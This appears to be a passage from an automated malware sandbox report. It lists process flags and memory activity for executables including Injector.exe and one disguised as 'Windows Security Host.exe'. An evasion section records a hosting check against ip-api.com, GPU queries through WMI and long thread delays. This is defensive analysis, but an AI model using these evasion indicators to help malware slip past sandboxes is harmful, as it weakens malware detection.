                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (80 identical entries)
                    Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
                    Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX (54 identical entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (125 identical entries)

                    Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe Memory allocated: A10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe Memory allocated: 1A6B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Injector.exe Memory allocated: 242BBC40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Injector.exe Memory allocated: 242D5750000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Memory allocated: 2450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Memory allocated: 1A6A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Memory allocated: 1EF95140000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Memory allocated: 1EFAEB30000 memory reserve | memory write watch
Source: C:\Users\user\Windows Security Host.exe Memory allocated: D50000 memory reserve | memory write watch
Source: C:\Users\user\Windows Security Host.exe Memory allocated: 1ABB0000 memory reserve | memory write watch
Source: C:\Users\user\Windows Security Host.exe Memory allocated: 1740000 memory reserve | memory write watch
Source: C:\Users\user\Windows Security Host.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Injector.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Injector.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599756
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599630
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599266
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 599032
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598921
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598812
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598703
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597986
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597708
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597579
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597454
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597329
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597217
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596310
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596204
